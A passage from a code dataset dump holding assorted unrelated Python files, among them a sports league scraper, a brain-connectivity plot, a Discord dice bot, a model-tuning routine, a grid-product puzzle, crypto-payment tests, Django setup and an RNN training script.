\n\n","sub_path":"generateClass.py","file_name":"generateClass.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"296007758","text":"# coding=utf-8\n__author__ = 'lifuxin'\n\nimport sys\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef league_info(url):\n \"\"\"\n 解析league url获取每个赛季的详细信息\n :param url: league url\n :return: 每个赛季的详细信息\n \"\"\"\n request = requests.get(url)\n tables = BeautifulSoup(request.text, \"html.parser\").find_all('table')\n for table in tables:\n if table.has_key('id'):\n head = table.find_all('tr')[1]\n headers = head.find_all('th')\n headers = [th.text for th in headers]\n columns = headers + ['seasonURL', 'lgURL']\n\n # print(columns)\n teams = pd.DataFrame(columns=columns)\n\n for key in table.find_all('tr')[2:]:\n tdValues = key.find_all('td')\n\n aURs = key.find_all('a')\n SeasonURL = ''\n lgURL = ''\n if len(aURs) >= 2:\n SeasonURL = aURs[0]['href']\n lgURL = aURs[1]['href']\n\n thValues = key.find_all('th')\n season = ''\n if len(thValues) >= 1:\n season = thValues[0].text\n\n def get_team(teamvalues):\n array = np.zeros(len(teamvalues), dtype=object)\n for i, value in enumerate(teamvalues):\n array[i] = value.text.replace('\\n', '\\t')\n return array\n\n tdTeam = np.concatenate((np.array([season]), get_team(tdValues), np.array([SeasonURL, lgURL])))\n\n if tdTeam.size != len(columns):\n continue\n teamArray = tdTeam.reshape(1, len(columns))\n team = pd.DataFrame(teamArray, columns=columns)\n teams = teams.append(team)\n\n teams = teams.set_index(columns[0])\n # print(teams)\n teams.to_csv(\"../data/league/league.details\", encoding='utf-8')\n\n\ndef main(argv):\n \"\"\"The main method for this module.\n \"\"\"\n league_info(argv[0])\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])","sub_path":"crawl/league_details.py","file_name":"league_details.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"367708548","text":"\"\"\"Plot coherence across subjects.\"\"\"\nimport numpy as np\nimport pandas as pd\n\nfrom brainpipe.system import 
Study\nfrom brainpipe.connectivity import concat_connect, remove_site_contact\n\nfrom visbrain.objects import (ConnectObj, SceneObj, SourceObj, BrainObj,\n ImageObj, RoiObj)\nfrom visbrain.gui import Brain\n\n\n\n###############################################################################\ncond = ('win-5120', 'REST1')\nviews = ['top', 'left']\nmin_nb_connect = 1\n###############################################################################\n\nst = Study('DMN-CORR')\ncoh_files = st.search(*cond, folder='coherence', full_path=False)\n\n\nconnect, mask, xyz, dfs = [], [], [], []\nfor f in coh_files:\n print('******************************************************************')\n print('Loading %s' % f)\n print('******************************************************************')\n suj = f.split('_')[0]\n\n # if suj == 'DB':\n # print(' SUBJECT DB IGNORED BECAUSE OF IMPLANTATION.')\n # continue\n\n # Load channels and xyz :\n print(\" Load channels, anatomy and coordinates of subject %s\" % suj)\n _chan = st.load('%s_channels.npy' % suj, folder='channels')\n _xyz = st.load('%s_xyz.npy' % suj, folder='xyz')\n xyz += [_xyz]\n dfs += [st.load('%s_anat.xlsx' % suj, folder='anatomy')]\n\n # Load coherence\n print(\" Load coherence of subject %s\" % suj)\n arch = st.load(f, folder='coherence')\n _connect, freqs = np.squeeze(arch['connect'])[..., 0].T, arch['freqs']\n connect += [np.real(_connect)]\n mask += [remove_site_contact(_connect, _chan)]\n\nprint(\"Concatenate xyz, connect, mask and anatomy\")\nxyz = np.concatenate(xyz, axis=0)\nconnect = concat_connect(connect)\nmask_contact = concat_connect(mask).astype(bool)\nmask_under = connect < .5\nmask = (mask_contact) | (mask_under)\nconnect = np.ma.masked_array(connect, mask=mask)\ndf = pd.concat(dfs)\ndf.index = pd.RangeIndex(len(df.index))\nprint(xyz.shape, connect.shape)\n\nprint(\"Get the number of connections per node :\")\nc_nb = ConnectObj('s', xyz, connect)\ndata = c_nb.get_nb_connections_per_node()[:, 1]\nc_r, labels, dfc = c_nb.analyse_connections('mist_ROI', group_by='name_ROI',\n get_centroids=True)\nxyz_r = np.array(dfc[['X', 'Y', 'Z']])\n\n\nprint(\"Remove sites with too less nb of connections per nodes\")\nrm_lines = np.where(data < min_nb_connect)[0]\nxyz = np.delete(xyz, rm_lines, axis=0)\nconnect = np.delete(connect, rm_lines, axis=0)\nconnect = np.delete(connect, rm_lines, axis=1)\nmask = np.delete(mask, rm_lines, axis=0)\nmask = np.delete(mask, rm_lines, axis=1)\ndf.drop(rm_lines, inplace=True)\ndf.index = pd.RangeIndex(len(df.index))\n\ngroups = df.groupby('name_ROI').groups\nlabels = [k for k, i in groups.items() if len(i) > 2]\nif 'Not_found' in labels:\n labels.pop(labels.index('Not found'))\nroi_obj = RoiObj('mist_ROI')\nindex = roi_obj.where_is(labels, exact=True, case_sensitive=False, union=True)\n\nconnect = np.ma.masked_array(connect, mask=mask)\n\nsc = SceneObj(bgcolor='white')\n\nfor k, v in enumerate(views):\n c_obj = ConnectObj('s', xyz, connect, antialias=True)\n data = c_obj.get_nb_connections_per_node()[:, 1]\n s_obj = SourceObj('s', xyz, alpha=.3, data=data, radius_min=0,\n radius_max=20)\n s_obj.color_sources(data=data)\n\n sc.add_to_subplot(s_obj, col=k)\n sc.add_to_subplot(c_obj, col=k)\n sc.add_to_subplot(BrainObj('B3'), rotate=v, use_this_cam=True, col=k)\n\n cr_obj = ConnectObj('r', xyz_r, c_r, antialias=True, line_width=10.)\n data_r = cr_obj.get_nb_connections_per_node()[:, 1]\n sr_obj = SourceObj('s', xyz_r, alpha=.3, data=data_r, radius_min=0,\n radius_max=20)\n sc.add_to_subplot(sr_obj, col=k, 
row=1)\n sc.add_to_subplot(cr_obj, col=k, row=1)\n sc.add_to_subplot(BrainObj('B3'), rotate=v, use_this_cam=True, col=k,\n row=1)\n\nsc.preview()\n\n","sub_path":"DMN-corr/02_plot/coherence/plot_coherence_across_subjects.py","file_name":"plot_coherence_across_subjects.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"62142900","text":"from discord.ext import commands\nimport random\n\nclass Random(commands.Cog, name=\"Random Cog\"):\n \"\"\"Receives ping commands\"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command()\n async def roll(self, ctx: commands.Context, dice: str):\n \"\"\"Checks for a response from the bot\"\"\"\n try:\n rolls = \"\"\n amount, die = dice.split(\"d\")\n for _ in range(int(amount)):\n roll = random.randint(1, int(die))\n rolls += f\"{roll} \"\n await ctx.send(rolls)\n except ValueError:\n await ctx.send(\"Dice must be in the format _d_ (example: 2d6)\")\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Random(bot))","sub_path":"modules/random/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"484283192","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 15 20:56:50 2019\n\n@author: Maureen\n\n\"\"\"\n\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import PredefinedSplit\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import mean_squared_log_error\nfrom sklearn.metrics import mean_squared_error\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math\n\nimport warnings\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\ndef index_splitter(N, fold):\n index_split = []\n test_num = int(N/fold)\n train_num = N-test_num\n\n for i in range(0,train_num):\n index_split.append(-1)\n\n for i in range(train_num,N):\n index_split.append(0)\n\n return index_split\n\n\n# Number of trees in random forest\ndef gb(X, Y, kfold=3, feature_set=None):\n \n arr = index_splitter(N = len(X), fold = kfold)\n ps = PredefinedSplit(arr)\n\n for train, test in ps.split():\n train_index = train\n test_index = test\n\n train_X, train_y = X.values[train_index,:], Y.values[train_index]\n test_X, test_y = X.values[test_index,:], Y.values[test_index]\n arr = index_splitter(N = len(train_X), fold = kfold)\n ps2 = PredefinedSplit(arr)\n \n \n gb = GradientBoostingRegressor(random_state = 42)\n print('Base parameter:')\n print(gb.get_params())\n gb.fit(train_X, train_y)\n \n\n #grid search\n lr_log = np.linspace(-8,5,14)\n\n lr = []\n for i in lr_log:\n a = math.pow(10,i)\n lr = lr + [a]\n \n n_estimators = [int(x) for x in range(20,200,20)] #[int(x) for x in np.linspace(start = 10, stop = 200, num = 50)]\n # Maximum number of levels in tree\n max_depth = [3, 5, 10, 20, 50]\n # Minimum number of samples required to split a node\n #min_samples_split = [2, 5, 10]\n # Minimum number of samples required at each leaf node\n #min_samples_leaf = [1, 2, 4]\n\n\n # Create the random grid\n grid_grid = {'learning_rate' : lr,\n 'n_estimators': n_estimators,\n 'max_depth': max_depth,\n #'min_samples_split': min_samples_split,\n #'min_samples_leaf': min_samples_leaf,\n }\n \n \n gb_grid = GridSearchCV(estimator=gb, 
param_grid=grid_grid, scoring='neg_mean_squared_error', cv = ps2.split(), verbose=2, n_jobs=-1)\n gb_grid.fit(train_X, train_y)\n BestPara_grid = gb_grid.best_params_\n print('Grid parameter:')\n print(gb_grid.best_params_)\n\n\n # Number of trees in random forest\n lr_unit = BestPara_grid['learning_rate']\n lr = [x for x in np.linspace(start = lr_unit, stop = lr_unit*9, num = 9)]\n \n ets_unit = BestPara_grid['n_estimators']\n n_estimators = [int(x) for x in range(ets_unit - 20, ets_unit + 20, 5)]\n \n max_depth = [BestPara_grid[\"max_depth\"]]\n \n '''\n # Minimum number of samples required to split a node\n min_samples_split = []\n for x in range(BestPara_grid[\"min_samples_split\"]-2,BestPara_grid[\"min_samples_split\"]+2,1):\n if x>1:\n min_samples_split.append(int(x))\n \n # Minimum number of samples required at each leaf node\n min_samples_leaf = []\n \n for x in range(BestPara_grid[\"min_samples_leaf\"]-1,BestPara_grid[\"min_samples_leaf\"]+1,1):\n if x>0:\n min_samples_leaf.append(int(x))\n '''\n # Create the random grid\n grid_grid2 = {'learning_rate' : lr,\n 'n_estimators': n_estimators,\n 'max_depth': max_depth,\n #'min_samples_split': min_samples_split,\n #'min_samples_leaf': min_samples_leaf,\n }\n \n gb_grid2 = GridSearchCV(estimator=gb, param_grid=grid_grid2, scoring='neg_mean_squared_error', cv = ps2.split(), verbose=2, n_jobs=-1)\n \n # Fit the grid search model\n gb_grid2.fit(train_X, train_y)\n BestPara_grid = gb_grid2.best_params_\n print(gb_grid2.best_params_)\n\n\n #prediction\n predict_y=gb_grid2.predict(test_X)\n predict_y_grid=gb_grid.predict(test_X)\n predict_y_base=gb.predict(test_X)\n \n \n #RMSE\n errors_baseline = np.sqrt(mean_squared_error(predict_y_base,test_y))\n errors_Grid_CV = np.sqrt(mean_squared_error(predict_y_grid,test_y))\n errors_Grid2_CV = np.sqrt(mean_squared_error(predict_y,test_y))\n\n results = [errors_baseline, errors_Grid_CV, errors_Grid2_CV]\n\n print('gradient boost results:',results)\n\n return gb_grid2.best_estimator_, results, gb_grid2.best_params_\n","sub_path":"Refactor3/model/gb_model.py","file_name":"gb_model.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"10427989","text":"import random\n\ndef multiply(numbers,val):\n if not numbers[1:]: return val*numbers[0]\n return multiply(numbers[1:],val*numbers[0])\n\nclass GridTraversal:\n\n def __init__(self, grid_file = None,dimensions=20,seed=50):\n if grid_file:\n with open('grid.txt') as grid:\n self.grid = [e.strip('\\n').split() for e in grid.readlines()]\n else:\n self.grid = self.generate_grid(dimensions,seed)\n self.seed = seed\n self.grid_coords = [(i,j) for i in range(len(self.grid)) for j in range(len(self.grid))]\n self.directions = ['up','up right','right','down right',\n 'down','down left','left','up left']\n\n def generate_grid(self,dimensions,s):\n random.seed(s)\n return [[str(random.randint(0,100)) for _ in range(dimensions)] for _ in range(dimensions)]\n\n def get_numbers(self,x,y,path,direction,of_length):\n ## print(path)\n if of_length >= len(self.grid) or of_length >= len(self.grid[0]):\n return False\n if direction == 'up' and path == [] and x >= of_length-1:\n return self.get_numbers(x-1,y,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'up' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x-1,y,path+[self.grid[x][y]],direction,of_length)\n \n if direction == 'up right' and path == [] and x >= of_length-1 and y 
<= len(self.grid[-1]) - of_length:\n return self.get_numbers(x-1,y+1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'up right' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x-1,y+1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'right' and path == [] and y <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x,y+1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'right' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x,y+1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'down right' and path == [] and x <= len(self.grid[-1]) - of_length and y <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x+1,y+1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'down right' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x+1,y+1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'down' and path == [] and x <= len(self.grid[-1]) - of_length:\n return self.get_numbers(x+1,y,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'down' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x+1,y,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'down left' and path == [] and x <= len(self.grid[-1]) - of_length and y >= of_length-1:\n return self.get_numbers(x+1,y-1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'down left' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x+1,y-1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'left' and path == [] and x >= of_length-1:\n return self.get_numbers(x,y-1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'left' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x,y-1,path+[self.grid[x][y]],direction,of_length)\n\n if direction == 'up left' and path == [] and x >= of_length-1 and y >= of_length-1:\n return self.get_numbers(x-1,y-1,path+[self.grid[x][y]],direction,of_length)\n elif direction == 'up left' and path:\n if len(path) == of_length:\n return path\n else:\n return self.get_numbers(x-1,y-1,path+[self.grid[x][y]],direction,of_length)\n\n def get_all_possible_paths(self,length=4):\n paths_dict = {}\n for cell in self.grid_coords:\n x,y = cell\n directions_dict = {}\n for d in self.directions:\n path = self.get_numbers(x,y,[],d,length)\n directions_dict[d] = path\n paths_dict[(self.grid[cell[0]][cell[1]],cell)] = directions_dict\n return paths_dict\n\n def print_current_grid(self):\n with open('grid_'+str(self.seed)+'.txt','w') as grid:\n for line in self.grid:\n print(' '.join(line),file=grid)\n\ntraversal = GridTraversal(dimensions=250)\npossible_paths = traversal.get_all_possible_paths(length=86)\nmax_product = max([(multiply([int(i) for i in e],1),e,k1[1],k2) for k1,v in possible_paths.items() for k2,e in v.items() if e],key=lambda x:x[0])\n\nprint('The max product is: ',max_product[0])\nprint('The path is: ',max_product[1])\nprint('The start position is: ',max_product[2])\nprint('In the direction: ',max_product[3])\n","sub_path":"Question 11/q11.py","file_name":"q11.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"38168891","text":"from CryptoPayment import CryptoPayment, convert\nfrom tinydb import TinyDB, where\nimport time\nimport threading\n\nif 
__name__ == '__main__':\n cch = CryptoPayment(test=True)\n cch.clearDB() \n cch.wallet_refresh_time = 0\n test_wallet_type = 'litecoin'\n\n test_results = {\n 'creating_wallets': None,\n 'deleting_wallets': None,\n 'creating_transactions': None,\n 'deleting_transactions': None,\n 'checking_transactions': None,\n 'display_tethered_transactions': None\n\n }\n # user may add wallets to the system\n wallet_list = ['0x1231kasd', '0x231231skdasd', '0x1231kasdcxzcas234']\n for wallet in wallet_list:\n try:\n cch.addWallet(wallet, test_wallet_type)\n except:\n pass\n \n\n test_wallet_list = cch.showWallets()\n if len(wallet_list) == len(test_wallet_list):\n print('!!creates wallets as usual')\n test_results['creating_wallets'] = True\n else:\n print(f'!#!expected to get {len(wallet_list)} instead of {len(test_wallet_list)}')\n test_results['creating_wallets'] = False\n\n # new transaction check\n workers_list = []\n for t in range(2):\n for i in range(3):\n worker = threading.Thread(target=cch.newTransaction, args=(test_wallet_type, 1.0242134))\n worker.start()\n workers_list.append(worker)\n for worker in workers_list:\n worker.join()\n\n transactions = cch.active_transactions.all()\n transactions_failures = 0\n for transaction in transactions:\n if len(list(filter( lambda x: x['protocol_units'] == transaction['protocol_units'] and x['wallet_adr'] == transaction['wallet_adr'], transactions))) != 1:\n print('number of transactions are not equal to 1')\n transactions_failures+=1\n \n if transactions_failures == 0:\n print('!!transactions are creating succesfully')\n test_results['creating_transactions'] = True\n else:\n print('!#!some troubles happend on creating transactions')\n test_results['creating_transactions'] = False\n\n # transactions may be aborted\n previous_amount_of_transactions = len(transactions)\n cch.deleteTransaction(transactions[0]['pk'])\n transactions = cch.active_transactions.all()\n if previous_amount_of_transactions > len(transactions):\n print('!!removes transactions as usual')\n test_results['deleting_transactions'] = True\n else:\n print('!!got an error while was removing transactions')\n test_results['deleting_transactions'] = False\n\n #user may remove wallets from the system\n cch.deleteWallet(wallet_list[0])\n test_wallet_list = cch.showWallets()\n if len(wallet_list) == len(test_wallet_list)+1:\n print('!!removes wallets as usual')\n test_results['deleting_wallets'] = True\n\n else:\n print(f'expected to get {len(wallet_list)} instead of {len(test_wallet_list)+1}')\n test_results['deleting_wallets'] = False\n\n #check transaction\n transaction = cch.active_transactions.all()[0]\n result1 = cch.checkActiveTransaction(transaction['pk'])\n time.sleep(1)\n if len( cch.finished_transactions.search(where('wallet_adr') == transaction['wallet_adr']) ) != 0:\n print(f'some of the transactions were marked as finished, none of the transactions supposed to be finished')\n # check if any of the current transaction is finished\n result2 = cch.checkActiveTransaction(transaction['pk'])\n if result1 is False and result2 is True:\n print(f'!!checking transaction test passed')\n else:\n print(f'!#!checking transaction test failed')\n time.sleep(2)\n\n # add a new transaction\n test_protocol_units = convert(test_wallet_type, protocol_units=cch.checker.test_transactions[-1]['balance_change'])\n test_new_transaction = cch.newTransaction(test_wallet_type, test_protocol_units)\n # check it, must be false\n transaction_result = cch.checkActiveTransaction(test_new_transaction['pk'])\n \n \n # 
showTetheredTransactions\n results = cch.showTetheredTransactions(test_new_transaction['wallet_adr'],test_wallet_type)\n if len(list(filter(lambda transaction: transaction['tethered_transaction'] != [], results))) > 0:\n print(f'showTetheredTransactions seems to be working as usual')\n else:\n print(f'showTetheredTransactions seems to have some troubles')\n\n # erase db\n cch.clearDB() \n print('tests finished')\n print(test_results)\n\n# test_transaction = {\"currency\":\"usdt\", 'amount': 100.00}\n# test_transaction2 = {\"currency\":\"usdt\", 'amount': 102.00}\n# test_results = []\n# for i in range(12):\n# test_results.append(registerReplenish(test_transaction) )\n# for i in range(14):\n# test_results.append(registerReplenish(test_transaction2) )\n# for i in test_results:\n# print(i)\n\n# deleteWallet(wallet_adr='', wallet_type=''):\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"321958498","text":"#!/usr/bin/python3\n\"\"\" Contains a function that divides all elements of a matrix. \"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\" Divides all elements of a matrix \"\"\"\n if type(matrix) is not list:\n raise TypeError(\"matrix must be a matrix \\\n(list of lists) of integers/floats\")\n for e in matrix:\n if type(e) is not list:\n raise TypeError(\"matrix must be a matrix \\\n(list of lists) of integers/floats\")\n l = len(matrix[0])\n if len(e) != l:\n raise TypeError(\"Each row of the matrix must have the same size\")\n for i in e:\n if type(i) is not int and type(i) is not float:\n raise TypeError(\"matrix must be a matrix \\\n(list of lists) of integers/floats\")\n if type(div) is not int and type(div) is not float:\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n\n return list(map(lambda y: list(map(lambda\n x: round(x / div, 2), y)), matrix))\n","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"307480494","text":"import pygame\nimport Game\nimport time\n\n\nclass SoundSystem:\n def __init__(self):\n self.volume = 100\n\n self.Startup = 'res/Sounds/Startup.wav'\n\n self.Music = 'res/Sounds/Music.wav'\n\n self.Attack = 'res/Sounds/Attack.wav'\n self.Mine = 'res/Sounds/Mine.wav'\n self.Moving = 'res/Sounds/Moving.wav'\n self.Error = 'res/Sounds/Error.wav'\n self.Click = 'res/Sounds/Click.wav'\n self.Victory = 'res/Sounds/Victory.wav'\n self.Card = 'res/Sounds/Card.wav'\n self.Mine_disabled = 'res/Sounds/Mine_disabled.wav'\n self.Heal = 'res/Sounds/Heal.wav'\n self.Emp = 'res/Sounds/Emp.wav'\n self.Fuel = 'res/Sounds/Fuel.wav'\n self.Place_mine = 'res/Sounds/Place_mine.wav'\n self.Ship_destroyed = 'res/Sounds/Ship_destroyed.wav'\n\n self.Music = 'res/Sounds/Music.wav'\n\n def play(self, sound):\n Game.Thread.create(self.play_asynch, [sound])\n\n def play_asynch(self, sound):\n sound = pygame.mixer.Sound(sound)\n sound.set_volume(self.volume / 100)\n sound.play()\n while pygame.mixer.get_busy() and not Game.EXIT:\n time.sleep(1 / 30)\n sound.set_volume(self.volume / 100)\n\n def loop(self, sound, t):\n Game.Thread.create(self.loop_asynch, [sound, t])\n\n def loop_asynch(self, sound, t):\n sound = pygame.mixer.Sound(sound)\n sound.set_volume(self.volume / 100)\n sound.play(-1)\n while 
pygame.mixer.get_busy() and not Game.EXIT:\n time.sleep(1 / 30)\n sound.set_volume(self.volume / 100)\n if t():\n sound.fadeout(1 * 1000)\n\n def getVolume(self):\n return self.volume\n\n def setVolume(self, volume):\n self.volume = volume\n","sub_path":"Sound/SoundSystem.py","file_name":"SoundSystem.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"206648727","text":"from django.urls import path\n\n\nfrom . import views\n\n\n#specifying app name (it can be used as 'football:homepage')\n\napp_name='football'\n\nurlpatterns = [\n path('' , views.HomePageView.as_view() , name='homepage'),\n path('players/' , views.PlayerList.as_view() , name='players'),\n path('clubs/' ,views.ClubList.as_view() ,name='clubs'),\n \n\n]\n\n\n","sub_path":"football/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"301367114","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('text', models.TextField(null=True)),\n ('pub_date', models.DateTimeField(verbose_name='date published', null=True)),\n ('moderation_requered', models.BooleanField(default=False)),\n ('author', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Guestbook',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('name', models.CharField(max_length=200)),\n ('url', models.SlugField()),\n ('premoderation', models.BooleanField(default=True)),\n ('pub_date', models.DateTimeField(verbose_name='date published', null=True)),\n ('author', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n ),\n migrations.AddField(\n model_name='comment',\n name='guestbook',\n field=models.ForeignKey(to='guestbook.Guestbook'),\n ),\n ]\n","sub_path":"guestbook_holder/guestbook/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"504180260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 22 12:55:06 2017\n\n@author: PaulJ\n\"\"\"\nimport pandas as pd\nimport os\n\n\ndef findAllZeroDistFiles(aDir=\".\",\n dataSaveFile=\"filesWithDist.csv\",\n verbose=False):\n allExFilesDistSummary = pd.DataFrame()\n noFiles = len(os.listdir(aDir))\n printInc = int(noFiles/10)\n lineNo = 0\n for sourcefilename in os.listdir(aDir):\n lineNo = lineNo + 1\n if lineNo % printInc == 0:\n print(\"Summarizing distance in file\", lineNo, \"of\", noFiles, end=\"\")\n print(\":\", sourcefilename)\n sourceDirFilename = aDir + \"\\\\\\\\\" + sourcefilename\n if not sourcefilename[-4:].lower()==\".csv\":\n continue\n #print(\"Distance summing\", sourcefilename)\n theExHist = pd.read_csv(sourceDirFilename,\n index_col=False)\n totdist = float(theExHist.iloc[len(theExHist)-1]['distance'])\n \n fileAndDist = pd.Series(data=[sourceDirFilename, totdist],\n 
index=[\"filename\", \"distance\"])\n allExFilesDistSummary = allExFilesDistSummary.append(fileAndDist,\n ignore_index=True)\n \n allExFilesDistSummary = allExFilesDistSummary.sort_values(by='distance',\n ascending=True)\n \n zeroCount = len(allExFilesDistSummary[allExFilesDistSummary.distance == 0])\n \n allExFilesDistSummary.to_csv(path_or_buf=dataSaveFile)\n \n zeroDistFileList = allExFilesDistSummary[allExFilesDistSummary.distance == 0]\n zeroDistFileList = zeroDistFileList.sort_values(by='filename',\n ascending=True)\n \n zeroDataSaveFilename = dataSaveFile[:-4] + \"_Zero.csv\"\n zeroDistFileList.to_csv(path_or_buf=zeroDataSaveFilename)\n \n return len(allExFilesDistSummary), zeroCount\n\n\nif __name__ == '__main__':\n totalFiles, zeroFiles = findAllZeroDistFiles(aDir=\"ExerciseData\",\n dataSaveFile=\"FilesWithDist_try3.csv\",\n verbose=True)\n print(totalFiles, \"files checked for distance.\",\n zeroFiles, \"found with zero distance\")","sub_path":"Archive Code/FindZeroDistExerciseFiles.py","file_name":"FindZeroDistExerciseFiles.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"148909985","text":"import logging\nimport os\nimport pickle\nimport sys\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\n\ntry:\n from .config import get_config\n from .SoSmodel import SoSModel\n from .session_sequence import create_dataset\n from .session_iterator import BatchIterator\nexcept SystemError: # pragma: no cover\n from config import get_config\n from SoSmodel import SoSModel\n from session_sequence import create_dataset\n from session_iterator import BatchIterator\n\n\nlogging.basicConfig(level=logging.INFO)\ntf.logging.set_verbosity(tf.logging.ERROR)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nif __name__ == '__main__':\n logger = logging.getLogger(__name__)\n try:\n if 'LOG_LEVEL' in os.environ and os.environ['LOG_LEVEL'] != '':\n logger.setLevel(os.environ['LOG_LEVEL'])\n except Exception as e:\n logger.error(\n 'Unable to set logging level because: {0} defaulting to INFO.'.format(str(e)))\n\n # Load info from config\n config = get_config()\n time_const = config['time constant']\n rnn_size = config['rnn size']\n labels = config['labels']\n\n # Path to training data\n data_dir = sys.argv[1]\n # Create the training data\n if len(sys.argv) == 3:\n data = create_dataset(data_dir, time_const)\n write_dir = sys.argv[2]\n logger.info('Saving data to %s', write_dir)\n with open(write_dir, 'wb') as handle:\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n data = data_dir\n\n logger.info('Loaded training data')\n # Create an iterator\n iterator = BatchIterator(\n data,\n labels,\n perturb_types=['random data', 'port swap', 'direction_swap']\n )\n logger.info('Created iterator')\n rnnmodel = SoSModel(rnn_size=100, label_size=len(labels))\n logger.info('Created model')\n try:\n rnnmodel.load('/models/SoSmodel')\n logger.info('Loaded model')\n except Exception as e:\n rnnmodel.initialize()\n logger.info('Initialized model')\n\n X_v, L_v, Y_v = iterator.gen_batch(\n split='validation',\n batch_size=64\n )\n\n cost = rnnmodel.get_cost(X_v, L_v, Y_v)\n out = rnnmodel.get_output(X_v, L_v)\n\n logger.info('Initial validation cost: %s', np.mean(cost))\n min_cost = cost\n last_save = 0\n for i in range(100000):\n tick = time.clock()\n X, L, Y = iterator.gen_batch(\n split='train',\n batch_size=64\n )\n tock = time.clock()\n _ = rnnmodel.train_on_batch(X, L, Y)\n if (i+1) % 100 
== 0:\n            cost = rnnmodel.get_cost(X_v, L_v, Y_v)\n            logger.info('Validation cost after %s batches: %s', i, cost)\n            if cost < min_cost:\n                min_cost = cost\n                rnnmodel.save('/new_models/SoSmodel')\n                last_save = 0\n                logger.info('Saving model at validation cost %s', cost)\n            else:\n                last_save += 100\n            if last_save > 1000:\n                logger.info('No improvement after 1000 iterations. Stopping.')\n                break\n","sub_path":"utils/train_SoSModel.py","file_name":"train_SoSModel.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
